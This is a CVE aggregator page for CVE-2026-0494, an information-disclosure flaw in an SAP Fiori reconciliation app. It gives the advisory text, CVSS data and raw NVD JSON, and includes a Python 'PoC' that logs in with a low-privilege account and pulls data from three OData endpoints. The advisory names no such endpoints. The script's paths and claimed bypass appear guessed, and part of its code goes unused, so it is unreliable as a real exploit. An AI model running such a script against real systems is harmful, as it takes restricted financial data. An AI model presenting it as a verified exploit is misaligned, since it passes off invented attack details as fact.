Security Vulnerability Report
中文
CVE-2026-0494 CVSS 4.3 MEDIUM

CVE-2026-0494

Published: 2026-01-13 02:15:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Under certain conditions SAP Fiori App Intercompany Balance Reconciliation application allows an attacker to access information which would otherwise be restricted. This has low impact on confidentiality of the application, integrity and availability are not impacted.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP Fiori App Intercompany Balance Reconciliation (受影响版本详见SAP Note 3655227)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0494 PoC - SAP Fiori Information Disclosure # Requires low-privilege SAP account import requests import json TARGET = "https://sap-system.example.com" USERNAME = "attacker_account" PASSWORD = "password" def exploit_cve_2026_0494(): """ SAP Fiori Intercompany Balance Reconciliation - Unauthorized Access Vulnerability: Insufficient access control on specific endpoints """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET}/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS" session.auth = (USERNAME, PASSWORD) # Step 2: Attempt to access restricted endpoint # The vulnerability allows bypassing access controls exploit_paths = [ "/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS/IntercompanyBalanceSet", "/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS/CompanyCodeDataSet", "/sap/opu/odata/sap/YY1_INTERCOMPANYBALANCE_CDS/LedgerDataSet" ] results = [] for path in exploit_paths: response = session.get(f"{TARGET}{path}", verify=False) if response.status_code == 200: results.append({ "path": path, "status": "VULNERABLE", "data": response.json() }) return results if __name__ == "__main__": print("CVE-2026-0494 PoC - Testing SAP Fiori Information Disclosure") data = exploit_cve_2026_0494() print(json.dumps(data, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0494", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:51.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Under certain conditions SAP Fiori App Intercompany Balance Reconciliation application allows an attacker to access information which would otherwise be restricted. This has low impact on confidentiality of the application, integrity and availability are not impacted."}, {"lang": "es", "value": "Bajo ciertas condiciones, la aplicación SAP Fiori Intercompany Balance Reconciliation permite a un atacante acceder a información que de otro modo estaría restringida. Esto tiene un bajo impacto en la confidencialidad de la aplicación; la integridad y la disponibilidad no se ven afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://me.sap.com/notes/3655227", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.